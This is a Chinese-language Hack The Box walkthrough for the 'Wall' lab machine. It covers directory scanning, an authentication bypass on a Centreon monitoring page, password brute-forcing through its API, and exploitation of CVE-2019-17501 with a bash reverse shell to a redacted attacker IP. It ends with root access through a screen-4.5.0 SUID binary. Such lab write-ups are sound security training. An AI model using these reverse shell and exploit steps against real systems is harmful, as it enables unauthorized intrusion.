Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Hack the box_Wall

Hack the box_Wall

作者头像
Khan安全团队
发布于 2020-03-10 13:38:56
发布于 2020-03-10 13:38:56
6580
举报
文章被收录于专栏:Khan安全团队Khan安全团队

大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。

信息枚举

masscan扫描开放端口

nmap探测22,80端口的服务信息,发现被过滤了

利用gobuster扫描web

->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157

->/.hta (Status: 403)

->/.htpasswd (Status: 403)

->/.htaccess (Status: 403)

->/index.html (Status: 200)

->/monitoring (Status: 401)

->/server-status (Status: 403)

只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改

在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的

我们使用Seclist字典进行爆破密码为 password1

我们发现了系统版本为19.04.0

低权限shell

该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下

->#!/bin/bash

->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1

再次写入bash命令获得反向连接shell

->bash /tmp/n00b.sh

并且获得TTY终端

权限提升

在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:

/bin/screen-4.5.0

使用poc获得root权限

最后我们得到了user.txt、root.txt

手握日月摘星辰,安全路上永不止步。

- Khan攻防安全实验室

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-12-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
Hack the box-Traverxec
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Traverxec”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
1.1K0
Hack the box-Traverxec
Hack the box-Network
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Network”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。
Khan安全团队
2020/03/08
7400
Hack the box-Network
Hack the box-Ellingson
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Ellingson”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/08
7430
Hack the box-Ellingson
Hackthebox_OpenAdmin
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“OpenAdmin”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
7260
Hackthebox_OpenAdmin
Hack the box-Heist
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Heist”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
9830
Hack the box-Heist
Hack the box-Jarvis
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Jarvis”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/08
7030
Hack the box-Jarvis
Hack the box-Json
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Json”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/09
7980
Hack the box-Json
Hack the Box - Obscurity
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Obscurity”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/20
2K0
Hack the box - Mango
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Mango”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
2.6K1
Hack the box - Mango
靶场练习 | Wall (hack the box)
声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!
安全小王子
2020/12/14
6400
靶场练习 | Wall (hack the box)
Hack the Box – Resolute
大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Resolute”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为中等级别,任务是找到靶机上的user.txt和root.txt。
Khan安全团队
2020/03/10
2.4K0
Hack the Box – Resolute
HTB:Charon渗透测试
靶机地址:https://www.hackthebox.eu/home/machines/profile/42
亿人安全
2022/08/30
7160
HTB:Charon渗透测试
迷糊的提权方式以及利用ssrf到最终提权靶机
因为是连了vpn的所以可以直接扫目标ip:10.10.11.111拿到目标 只有ip 那就先扫端口nmap -v -sSV -Pn 10.10.11.111 -T4 -sC
亿人安全
2022/06/30
1.5K0
迷糊的提权方式以及利用ssrf到最终提权靶机
HTB渗透之Tenten
Tenten 是一个中等难度的靶机,知识点涉及 WordPress 插件利用、SSH 密钥爆破、SSH 私钥登录、sudo 提权等。感兴趣的同学可以在HackTheBox中进行学习。
亿人安全
2022/12/23
5210
HTB渗透之Tenten
记一次对Hackmyvm-Area51靶机的渗透测试
下载完Area51.ova后,使用Oracle VM VirtualBox导入即可
亿人安全
2022/06/30
4020
记一次对Hackmyvm-Area51靶机的渗透测试
Hack The Box,一款有意思的渗透测试平台
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中一些模拟真实场景,其中一些更倾向于CTF风格的挑战。
FB客服
2022/11/14
1.1K0
Hack The Box,一款有意思的渗透测试平台
【HTB】Beep(LFI,RCE,sudo特权:nmap)
开了好多端口,现实当中端口越多漏洞越多,但是具体到这些靶机,很可能意味着很多兔子洞,所以枚举的时候一定要小心分辨
玖柒的小窝
2021/12/09
5330
HackTheBox chaos writeup
大家好,我是大白,鉴于在强网杯中受到了打击,决定努力提升一下自己姿势水平,先去hackthebox刷一波退役靶机
黑伞安全
2019/10/16
9260
HackTheBox chaos writeup
HTB靶机-base实战分享
之后准备长期更新HTB系列,由易到难,开了VIP,所有靶机的思路都会更新,让大家尽可能多的学习到挖洞技巧,请大家持续关注咱们的微信公众号,字节脉搏实验室。
字节脉搏实验室
2020/04/07
1.1K0
HTB靶机-base实战分享
HTB: Arkham
Arkham是一个中等难度的靶机,但是它的难度可以和困难相媲美。其中涉及了lucks解密、JSF ViewState反序列化、ost邮件分析、UAC绕过等相关知识。ViewState反序列化漏洞让我学到了很多,虽然其中的数据是加密的,但是它提供了一个用于执行攻击的密钥使得我能够成功获取shell,上线后在电子邮件中找到了管理员密码,需要绕过UAC限制拿到最后的flag。感兴趣的同学可以在HackTheBox中进行学习。
亿人安全
2022/06/30
1.9K0
HTB:  Arkham
相关推荐
Hack the box-Traverxec
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档